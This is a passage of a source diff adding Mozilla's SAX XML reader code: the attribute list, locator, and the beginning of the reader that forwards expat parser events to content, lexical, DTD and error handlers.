+ * + * @note This is currently supported only for + * http://xml.org/sax/features/namespace-prefixes . All other + * features will result in a NOT_IMPLEMENTED exception. + */ + void setFeature(in AString name, in boolean value); + + /** + * Look up the value of a feature flag. + * + * The feature name is any fully-qualified URI. It is + * possible for an XMLReader to recognize a feature name but + * temporarily be unable to return its value. + * Some feature values may be available only in specific + * contexts, such as before, during, or after a parse. + * + * All XMLReaders are required to recognize the + * http://xml.org/sax/features/namespaces and the + * http://xml.org/sax/features/namespace-prefixes feature names. + * + * @param name String flag for a parser feature. + * + * @note This is currently supported only for + * http://xml.org/sax/features/namespace-prefixes . All other + * features will result in a NOT_IMPLEMENTED exception. + */ + boolean getFeature(in AString name); + + /** + * Set the value of a property. NOT CURRENTLY IMPLEMENTED. + * + * The property name is any fully-qualified URI. It is possible + * for an XMLReader to recognize a property name but to be unable to + * change the current value. Some property values may be immutable + * or mutable only in specific contexts, such as before, during, or + * after a parse. + * + * XMLReaders are not required to recognize setting any specific + * property names, though a core set is defined by SAX2. + * + * This method is also the standard mechanism for setting + * extended handlers. + * + * @param name The property name, which is a fully-qualified URI. + * @param value The value to set for the property. + */ + void setProperty(in AString name, in nsISupports value); + + /** + * Look up the value of a property. NOT CURRENTLY IMPLEMENTED. + * + * The property name is any fully-qualified URI. It is + * possible for an XMLReader to recognize a property name but + * temporarily be unable to return its value.
+ * Some property values may be available only in specific + * contexts, such as before, during, or after a parse. + * + * XMLReaders are not required to recognize any specific + * property names, though an initial core set is documented for + * SAX2. + * + * Implementors are free (and encouraged) to invent their own properties, + * using names built on their own URIs. + * + * @param name The property name, which is a fully-qualified URI. + * @return The current value of the property. + */ + boolean getProperty(in AString name); + + /** + * + * @param str The UTF16 string to be parsed + * @param contentType The content type of the string (see parseFromStream) + * + */ + void parseFromString(in AString str, in string contentType); + + /** + * + * @param stream The byte stream whose contents are parsed + * @param charset The character set that was used to encode the byte + * stream. NULL if not specified. + * @param contentType The content type of the string - either text/xml, + * application/xml, or application/xhtml+xml. + * Must not be NULL. + * + */ + void parseFromStream(in nsIInputStream stream, + in string charset, + in string contentType); + + /** + * Begin an asynchronous parse. This method initializes the parser, + * and must be called before any nsIStreamListener methods. It is + * then the caller's duty to call nsIStreamListener methods to drive + * the parser. Once this method is called, the caller must not call + * one of the other parse methods. + * + * @param observer The nsIRequestObserver to notify upon start or stop. + * Can be NULL. + */ + void parseAsync(in nsIRequestObserver observer); +}; diff --git a/parser/xml/nsSAXAttributes.cpp b/parser/xml/nsSAXAttributes.cpp new file mode 100644 index 000000000..3984186e4 --- /dev/null +++ b/parser/xml/nsSAXAttributes.cpp @@ -0,0 +1,332 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 
2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsSAXAttributes.h" + +NS_IMPL_ISUPPORTS(nsSAXAttributes, nsISAXAttributes, nsISAXMutableAttributes) + +NS_IMETHODIMP +nsSAXAttributes::GetIndexFromName(const nsAString &aURI, + const nsAString &aLocalName, + int32_t *aResult) +{ + int32_t len = mAttrs.Length(); + int32_t i; + for (i = 0; i < len; ++i) { + const SAXAttr &att = mAttrs[i]; + if (att.localName.Equals(aLocalName) && att.uri.Equals(aURI)) { + *aResult = i; + return NS_OK; + } + } + *aResult = -1; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetIndexFromQName(const nsAString &aQName, int32_t *aResult) +{ + int32_t len = mAttrs.Length(); + int32_t i; + for (i = 0; i < len; ++i) { + const SAXAttr &att = mAttrs[i]; + if (att.qName.Equals(aQName)) { + *aResult = i; + return NS_OK; + } + } + *aResult = -1; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetLength(int32_t *aResult) +{ + *aResult = mAttrs.Length(); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetLocalName(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.localName; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetQName(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.qName; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetType(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.type; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetTypeFromName(const nsAString &aURI, + const nsAString &aLocalName, + nsAString &aResult) +{ + int32_t 
index = -1; + GetIndexFromName(aURI, aLocalName, &index); + if (index >= 0) { + aResult = mAttrs[index].type; + } else { + aResult.SetIsVoid(true); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetTypeFromQName(const nsAString &aQName, nsAString &aResult) +{ + int32_t index = -1; + GetIndexFromQName(aQName, &index); + if (index >= 0) { + aResult = mAttrs[index].type; + } else { + aResult.SetIsVoid(true); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetURI(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.uri; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetValue(uint32_t aIndex, nsAString &aResult) +{ + uint32_t len = mAttrs.Length(); + if (aIndex >= len) { + aResult.SetIsVoid(true); + } else { + const SAXAttr &att = mAttrs[aIndex]; + aResult = att.value; + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetValueFromName(const nsAString &aURI, + const nsAString &aLocalName, + nsAString &aResult) +{ + int32_t index = -1; + GetIndexFromName(aURI, aLocalName, &index); + if (index >= 0) { + aResult = mAttrs[index].value; + } else { + aResult.SetIsVoid(true); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::GetValueFromQName(const nsAString &aQName, + nsAString &aResult) +{ + int32_t index = -1; + GetIndexFromQName(aQName, &index); + if (index >= 0) { + aResult = mAttrs[index].value; + } else { + aResult.SetIsVoid(true); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::AddAttribute(const nsAString &aURI, + const nsAString &aLocalName, + const nsAString &aQName, + const nsAString &aType, + const nsAString &aValue) +{ + SAXAttr *att = mAttrs.AppendElement(); + if (!att) { + return NS_ERROR_OUT_OF_MEMORY; + } + + att->uri = aURI; + att->localName = aLocalName; + att->qName = aQName; + att->type = aType; + att->value = aValue; + + return NS_OK; +} + 
+NS_IMETHODIMP +nsSAXAttributes::Clear() +{ + mAttrs.Clear(); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::RemoveAttribute(uint32_t aIndex) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs.RemoveElementAt(aIndex); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetAttributes(nsISAXAttributes *aAttributes) +{ + NS_ENSURE_ARG(aAttributes); + + nsresult rv; + int32_t len; + rv = aAttributes->GetLength(&len); + NS_ENSURE_SUCCESS(rv, rv); + + mAttrs.Clear(); + SAXAttr *att; + int32_t i; + for (i = 0; i < len; ++i) { + att = mAttrs.AppendElement(); + if (!att) { + return NS_ERROR_OUT_OF_MEMORY; + } + rv = aAttributes->GetURI(i, att->uri); + NS_ENSURE_SUCCESS(rv, rv); + rv = aAttributes->GetLocalName(i, att->localName); + NS_ENSURE_SUCCESS(rv, rv); + rv = aAttributes->GetQName(i, att->qName); + NS_ENSURE_SUCCESS(rv, rv); + rv = aAttributes->GetType(i, att->type); + NS_ENSURE_SUCCESS(rv, rv); + rv = aAttributes->GetValue(i, att->value); + NS_ENSURE_SUCCESS(rv, rv); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetAttribute(uint32_t aIndex, + const nsAString &aURI, + const nsAString &aLocalName, + const nsAString &aQName, + const nsAString &aType, + const nsAString &aValue) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + + SAXAttr &att = mAttrs[aIndex]; + att.uri = aURI; + att.localName = aLocalName; + att.qName = aQName; + att.type = aType; + att.value = aValue; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetLocalName(uint32_t aIndex, const nsAString &aLocalName) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].localName = aLocalName; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetQName(uint32_t aIndex, const nsAString &aQName) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].qName = aQName; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetType(uint32_t aIndex, const nsAString 
&aType) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].type = aType; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetURI(uint32_t aIndex, const nsAString &aURI) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].uri = aURI; + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXAttributes::SetValue(uint32_t aIndex, const nsAString &aValue) +{ + if (aIndex >= mAttrs.Length()) { + return NS_ERROR_FAILURE; + } + mAttrs[aIndex].value = aValue; + + return NS_OK; +} diff --git a/parser/xml/nsSAXAttributes.h b/parser/xml/nsSAXAttributes.h new file mode 100644 index 000000000..f8da6f8a1 --- /dev/null +++ b/parser/xml/nsSAXAttributes.h @@ -0,0 +1,43 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. 
*/ + +#ifndef nsSAXAttributes_h__ +#define nsSAXAttributes_h__ + +#include "nsISupports.h" +#include "nsISAXAttributes.h" +#include "nsISAXMutableAttributes.h" +#include "nsTArray.h" +#include "nsString.h" +#include "mozilla/Attributes.h" + +#define NS_SAXATTRIBUTES_CONTRACTID "@mozilla.org/saxparser/attributes;1" +#define NS_SAXATTRIBUTES_CID \ +{/* {7bb40992-77eb-43db-9a4e-39d3bcc483ae}*/ \ +0x7bb40992, 0x77eb, 0x43db, \ +{ 0x9a, 0x4e, 0x39, 0xd3, 0xbc, 0xc3, 0x83, 0xae} } + +struct SAXAttr +{ + nsString uri; + nsString localName; + nsString qName; + nsString type; + nsString value; +}; + +class nsSAXAttributes final : public nsISAXMutableAttributes +{ +public: + NS_DECL_ISUPPORTS + NS_DECL_NSISAXATTRIBUTES + NS_DECL_NSISAXMUTABLEATTRIBUTES + +private: + ~nsSAXAttributes() {} + nsTArray<SAXAttr> mAttrs; +}; + +#endif // nsSAXAttributes_h__ diff --git a/parser/xml/nsSAXLocator.cpp b/parser/xml/nsSAXLocator.cpp new file mode 100644 index 000000000..16a056ac6 --- /dev/null +++ b/parser/xml/nsSAXLocator.cpp @@ -0,0 +1,47 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. 
*/ + +#include "nsSAXLocator.h" + +NS_IMPL_ISUPPORTS(nsSAXLocator, nsISAXLocator) + +nsSAXLocator::nsSAXLocator(nsString& aPublicId, + nsString& aSystemId, + int32_t aLineNumber, + int32_t aColumnNumber) : + mPublicId(aPublicId), + mSystemId(aSystemId), + mLineNumber(aLineNumber), + mColumnNumber(aColumnNumber) +{ +} + +NS_IMETHODIMP +nsSAXLocator::GetColumnNumber(int32_t *aColumnNumber) +{ + *aColumnNumber = mColumnNumber; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXLocator::GetLineNumber(int32_t *aLineNumber) +{ + *aLineNumber = mLineNumber; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXLocator::GetPublicId(nsAString &aPublicId) +{ + aPublicId = mPublicId; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXLocator::GetSystemId(nsAString &aSystemId) +{ + aSystemId = mSystemId; + return NS_OK; +} diff --git a/parser/xml/nsSAXLocator.h b/parser/xml/nsSAXLocator.h new file mode 100644 index 000000000..14b9ef063 --- /dev/null +++ b/parser/xml/nsSAXLocator.h @@ -0,0 +1,39 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. 
*/ + +#ifndef nsSAXLocator_h__ +#define nsSAXLocator_h__ + +#include "nsISAXLocator.h" +#include "nsString.h" +#include "mozilla/Attributes.h" + +#define NS_SAXLOCATOR_CONTRACTID "@mozilla.org/saxparser/locator;1" +#define NS_SAXLOCATOR_CID \ +{/* {c1cd4045-846b-43bb-a95e-745a3d7b40e0}*/ \ +0xc1cd4045, 0x846b, 0x43bb, \ +{ 0xa9, 0x5e, 0x74, 0x5a, 0x3d, 0x7b, 0x40, 0xe0} } + +class nsSAXLocator final : public nsISAXLocator +{ +public: + NS_DECL_ISUPPORTS + NS_DECL_NSISAXLOCATOR + + nsSAXLocator(nsString& aPublicId, + nsString& aSystemId, + int32_t aLineNumber, + int32_t aColumnNumber); + +private: + ~nsSAXLocator() {} + + nsString mPublicId; + nsString mSystemId; + int32_t mLineNumber; + int32_t mColumnNumber; +}; + +#endif //nsSAXLocator_h__ diff --git a/parser/xml/nsSAXXMLReader.cpp b/parser/xml/nsSAXXMLReader.cpp new file mode 100644 index 000000000..a84e0d63b --- /dev/null +++ b/parser/xml/nsSAXXMLReader.cpp @@ -0,0 +1,719 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. 
*/ + +#include "nsIInputStream.h" +#include "nsNetCID.h" +#include "nsNetUtil.h" +#include "nsNullPrincipal.h" +#include "nsIParser.h" +#include "nsParserCIID.h" +#include "nsStreamUtils.h" +#include "nsStringStream.h" +#include "nsIScriptError.h" +#include "nsSAXAttributes.h" +#include "nsSAXLocator.h" +#include "nsSAXXMLReader.h" +#include "nsCharsetSource.h" + +#include "mozilla/dom/EncodingUtils.h" + +using mozilla::dom::EncodingUtils; + +#define XMLNS_URI "http://www.w3.org/2000/xmlns/" + +static NS_DEFINE_CID(kParserCID, NS_PARSER_CID); + +NS_IMPL_CYCLE_COLLECTION(nsSAXXMLReader, + mContentHandler, + mDTDHandler, + mErrorHandler, + mLexicalHandler, + mDeclarationHandler, + mBaseURI, + mListener, + mParserObserver) +NS_IMPL_CYCLE_COLLECTING_ADDREF(nsSAXXMLReader) +NS_IMPL_CYCLE_COLLECTING_RELEASE(nsSAXXMLReader) +NS_INTERFACE_MAP_BEGIN_CYCLE_COLLECTION(nsSAXXMLReader) + NS_INTERFACE_MAP_ENTRY(nsISAXXMLReader) + NS_INTERFACE_MAP_ENTRY(nsIExpatSink) + NS_INTERFACE_MAP_ENTRY(nsIExtendedExpatSink) + NS_INTERFACE_MAP_ENTRY(nsIContentSink) + NS_INTERFACE_MAP_ENTRY(nsIRequestObserver) + NS_INTERFACE_MAP_ENTRY(nsIStreamListener) + NS_INTERFACE_MAP_ENTRY_AMBIGUOUS(nsISupports, nsISAXXMLReader) +NS_INTERFACE_MAP_END + +nsSAXXMLReader::nsSAXXMLReader() : + mIsAsyncParse(false), + mEnableNamespacePrefixes(false) +{ +} + +// nsIContentSink +NS_IMETHODIMP +nsSAXXMLReader::WillBuildModel(nsDTDMode) +{ + if (mContentHandler) + return mContentHandler->StartDocument(); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::DidBuildModel(bool aTerminated) +{ + if (mContentHandler) + return mContentHandler->EndDocument(); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetParser(nsParserBase *aParser) +{ + return NS_OK; +} + +// nsIExtendedExpatSink +NS_IMETHODIMP +nsSAXXMLReader::HandleStartElement(const char16_t *aName, + const char16_t **aAtts, + uint32_t aAttsCount, + uint32_t aLineNumber) +{ + if (!mContentHandler) + return NS_OK; + + RefPtr<nsSAXAttributes> atts = 
new nsSAXAttributes(); + if (!atts) + return NS_ERROR_OUT_OF_MEMORY; + nsAutoString uri, localName, qName; + for (; *aAtts; aAtts += 2) { + SplitExpatName(aAtts[0], uri, localName, qName); + // XXX don't have attr type information + NS_NAMED_LITERAL_STRING(cdataType, "CDATA"); + // could support xmlns reporting, it's a standard SAX feature + if (mEnableNamespacePrefixes || !uri.EqualsLiteral(XMLNS_URI)) { + NS_ASSERTION(aAtts[1], "null passed to handler"); + atts->AddAttribute(uri, localName, qName, cdataType, + nsDependentString(aAtts[1])); + } + } + + // Deal with the element name + SplitExpatName(aName, uri, localName, qName); + return mContentHandler->StartElement(uri, localName, qName, atts); +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleEndElement(const char16_t *aName) +{ + if (mContentHandler) { + nsAutoString uri, localName, qName; + SplitExpatName(aName, uri, localName, qName); + return mContentHandler->EndElement(uri, localName, qName); + } + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleComment(const char16_t *aName) +{ + NS_ASSERTION(aName, "null passed to handler"); + if (mLexicalHandler) + return mLexicalHandler->Comment(nsDependentString(aName)); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleCDataSection(const char16_t *aData, + uint32_t aLength) +{ + nsresult rv; + if (mLexicalHandler) { + rv = mLexicalHandler->StartCDATA(); + NS_ENSURE_SUCCESS(rv, rv); + } + + if (mContentHandler) { + rv = mContentHandler->Characters(Substring(aData, aData+aLength)); + NS_ENSURE_SUCCESS(rv, rv); + } + + if (mLexicalHandler) { + rv = mLexicalHandler->EndCDATA(); + NS_ENSURE_SUCCESS(rv, rv); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleStartDTD(const char16_t *aName, + const char16_t *aSystemId, + const char16_t *aPublicId) +{ + char16_t nullChar = char16_t(0); + if (!aName) + aName = &nullChar; + if (!aSystemId) + aSystemId = &nullChar; + if (!aPublicId) + aPublicId = &nullChar; + + mSystemId = aSystemId; + mPublicId = 
aPublicId; + if (mLexicalHandler) { + return mLexicalHandler->StartDTD(nsDependentString(aName), + nsDependentString(aPublicId), + nsDependentString(aSystemId)); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleDoctypeDecl(const nsAString & aSubset, + const nsAString & aName, + const nsAString & aSystemId, + const nsAString & aPublicId, + nsISupports* aCatalogData) +{ + if (mLexicalHandler) + return mLexicalHandler->EndDTD(); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleCharacterData(const char16_t *aData, + uint32_t aLength) +{ + if (mContentHandler) + return mContentHandler->Characters(Substring(aData, aData+aLength)); + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleStartNamespaceDecl(const char16_t *aPrefix, + const char16_t *aUri) +{ + if (!mContentHandler) + return NS_OK; + + char16_t nullChar = char16_t(0); + if (!aPrefix) + aPrefix = &nullChar; + if (!aUri) + aUri = &nullChar; + + return mContentHandler->StartPrefixMapping(nsDependentString(aPrefix), + nsDependentString(aUri)); +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleEndNamespaceDecl(const char16_t *aPrefix) +{ + if (!mContentHandler) + return NS_OK; + + if (aPrefix) + return mContentHandler->EndPrefixMapping(nsDependentString(aPrefix)); + + return mContentHandler->EndPrefixMapping(EmptyString()); +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleProcessingInstruction(const char16_t *aTarget, + const char16_t *aData) +{ + NS_ASSERTION(aTarget && aData, "null passed to handler"); + if (mContentHandler) { + return mContentHandler->ProcessingInstruction(nsDependentString(aTarget), + nsDependentString(aData)); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleNotationDecl(const char16_t *aNotationName, + const char16_t *aSystemId, + const char16_t *aPublicId) +{ + NS_ASSERTION(aNotationName, "null passed to handler"); + if (mDTDHandler) { + char16_t nullChar = char16_t(0); + if (!aSystemId) + aSystemId = &nullChar; + if (!aPublicId) + aPublicId = &nullChar; 
+ + return mDTDHandler->NotationDecl(nsDependentString(aNotationName), + nsDependentString(aSystemId), + nsDependentString(aPublicId)); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleUnparsedEntityDecl(const char16_t *aEntityName, + const char16_t *aSystemId, + const char16_t *aPublicId, + const char16_t *aNotationName) +{ + NS_ASSERTION(aEntityName && aNotationName, "null passed to handler"); + if (mDTDHandler) { + char16_t nullChar = char16_t(0); + if (!aSystemId) + aSystemId = &nullChar; + if (!aPublicId) + aPublicId = &nullChar; + + return mDTDHandler->UnparsedEntityDecl(nsDependentString(aEntityName), + nsDependentString(aSystemId), + nsDependentString(aPublicId), + nsDependentString(aNotationName)); + } + + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::HandleXMLDeclaration(const char16_t *aVersion, + const char16_t *aEncoding, + int32_t aStandalone) +{ + NS_ASSERTION(aVersion, "null passed to handler"); + if (mDeclarationHandler) { + char16_t nullChar = char16_t(0); + if (!aEncoding) + aEncoding = &nullChar; + mDeclarationHandler->HandleXMLDeclaration(nsDependentString(aVersion), + nsDependentString(aEncoding), + aStandalone > 0); + } + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::ReportError(const char16_t* aErrorText, + const char16_t* aSourceText, + nsIScriptError *aError, + bool *_retval) +{ + NS_PRECONDITION(aError && aSourceText && aErrorText, "Check arguments!!!"); + // Normally, the expat driver should report the error. 
+ *_retval = true; + + if (mErrorHandler) { + uint32_t lineNumber; + nsresult rv = aError->GetLineNumber(&lineNumber); + NS_ENSURE_SUCCESS(rv, rv); + + uint32_t columnNumber; + rv = aError->GetColumnNumber(&columnNumber); + NS_ENSURE_SUCCESS(rv, rv); + + nsCOMPtr<nsISAXLocator> locator = new nsSAXLocator(mPublicId, + mSystemId, + lineNumber, + columnNumber); + if (!locator) + return NS_ERROR_OUT_OF_MEMORY; + + rv = mErrorHandler->FatalError(locator, nsDependentString(aErrorText)); + if (NS_SUCCEEDED(rv)) { + // The error handler has handled the script error. Don't log to console. + *_retval = false; + } + } + + return NS_OK; +} + +// nsISAXXMLReader + +NS_IMETHODIMP +nsSAXXMLReader::GetBaseURI(nsIURI **aBaseURI) +{ + NS_IF_ADDREF(*aBaseURI = mBaseURI); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetBaseURI(nsIURI *aBaseURI) +{ + mBaseURI = aBaseURI; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetContentHandler(nsISAXContentHandler **aContentHandler) +{ + NS_IF_ADDREF(*aContentHandler = mContentHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetContentHandler(nsISAXContentHandler *aContentHandler) +{ + mContentHandler = aContentHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetDtdHandler(nsISAXDTDHandler **aDtdHandler) +{ + NS_IF_ADDREF(*aDtdHandler = mDTDHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetDtdHandler(nsISAXDTDHandler *aDtdHandler) +{ + mDTDHandler = aDtdHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetErrorHandler(nsISAXErrorHandler **aErrorHandler) +{ + NS_IF_ADDREF(*aErrorHandler = mErrorHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetErrorHandler(nsISAXErrorHandler *aErrorHandler) +{ + mErrorHandler = aErrorHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetFeature(const nsAString &aName, bool aValue) +{ + if (aName.EqualsLiteral("http://xml.org/sax/features/namespace-prefixes")) { + mEnableNamespacePrefixes = aValue; + return NS_OK; + } 
+ return NS_ERROR_NOT_IMPLEMENTED; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetFeature(const nsAString &aName, bool *aResult) +{ + if (aName.EqualsLiteral("http://xml.org/sax/features/namespace-prefixes")) { + *aResult = mEnableNamespacePrefixes; + return NS_OK; + } + return NS_ERROR_NOT_IMPLEMENTED; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetDeclarationHandler(nsIMozSAXXMLDeclarationHandler **aDeclarationHandler) { + NS_IF_ADDREF(*aDeclarationHandler = mDeclarationHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetDeclarationHandler(nsIMozSAXXMLDeclarationHandler *aDeclarationHandler) { + mDeclarationHandler = aDeclarationHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetLexicalHandler(nsISAXLexicalHandler **aLexicalHandler) +{ + NS_IF_ADDREF(*aLexicalHandler = mLexicalHandler); + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetLexicalHandler(nsISAXLexicalHandler *aLexicalHandler) +{ + mLexicalHandler = aLexicalHandler; + return NS_OK; +} + +NS_IMETHODIMP +nsSAXXMLReader::SetProperty(const nsAString &aName, nsISupports* aValue) +{ + return NS_ERROR_NOT_IMPLEMENTED; +} + +NS_IMETHODIMP +nsSAXXMLReader::GetProperty(const nsAString &aName, bool *aResult) +{ + return NS_ERROR_NOT_IMPLEMENTED; +} + +NS_IMETHODIMP +nsSAXXMLReader::ParseFromString(const nsAString &aStr, + const char *aContentType) +{ + // Don't call this in the middle of an async parse + NS_ENSURE_TRUE(!mIsAsyncParse, NS_ERROR_FAILURE); + + NS_ConvertUTF16toUTF8 data(aStr); + + // The new stream holds a reference to the buffer + nsCOMPtr<nsIInputStream> stream; + nsresult rv = NS_NewByteInputStream(getter_AddRefs(stream), + data.get(), data.Length(), + NS_ASSIGNMENT_DEPEND); + NS_ENSURE_SUCCESS(rv, rv); + return ParseFromStream(stream, "UTF-8", aContentType); +} + +NS_IMETHODIMP +nsSAXXMLReader::ParseFromStream(nsIInputStream *aStream, + const char *aCharset, + const char *aContentType) +{ + // Don't call this in the middle of an async parse + NS_ENSURE_TRUE(!mIsAsyncParse, 
NS_ERROR_FAILURE); + + NS_ENSURE_ARG(aStream); + NS_ENSURE_ARG(aContentType); + + // Put the nsCOMPtr out here so we hold a ref to the stream as needed + nsresult rv; + nsCOMPtr<nsIInputStream> bufferedStream; + if (!NS_InputStreamIsBuffered(aStream)) { + rv = NS_NewBufferedInputStream(getter_AddRefs(bufferedStream), + aStream, 4096); + NS_ENSURE_SUCCESS(rv, rv); + aStream = bufferedStream; + } + + rv = EnsureBaseURI(); + NS_ENSURE_SUCCESS(rv, rv); + + nsCOMPtr<nsIPrincipal> nullPrincipal = nsNullPrincipal::Create(); + + // The following channel is never opened, so it does not matter what + // securityFlags we pass; let's follow the principle of least privilege. + nsCOMPtr<nsIChannel> parserChannel; + rv = NS_NewInputStreamChannel(getter_AddRefs(parserChannel), + mBaseURI, + aStream, + nullPrincipal, + nsILoadInfo::SEC_REQUIRE_SAME_ORIGIN_DATA_IS_BLOCKED, + nsIContentPolicy::TYPE_OTHER, + nsDependentCString(aContentType)); + if (!parserChannel || NS_FAILED(rv)) + return NS_ERROR_FAILURE; + + if (aCharset) + parserChannel->SetContentCharset(nsDependentCString(aCharset)); + + rv = InitParser(nullptr, parserChannel); + NS_ENSURE_SUCCESS(rv, rv); + + rv = mListener->OnStartRequest(parserChannel, nullptr); + if (NS_FAILED(rv)) + parserChannel->Cancel(rv); + + /* When parsing a new document, we need to clear the XML identifiers. + HandleStartDTD will set these values from the DTD declaration tag. + We won't have them, of course, if there's a well-formedness error + before the DTD tag (such as a space before an XML declaration). + */ + mSystemId.Truncate(); + mPublicId.Truncate(); + + nsresult status; + parserChannel->GetStatus(&status); + + uint64_t offset = 0; + while (NS_SUCCEEDED(rv) && NS_SUCCEEDED(status)) { + uint64_t available; + rv = aStream->Available(&available); + if (rv == NS_BASE_STREAM_CLOSED) { + rv = NS_OK; + available = 0; + } + if (NS_FAILED(rv)) { + parserChannel->Cancel(rv); + break; + } + if (!
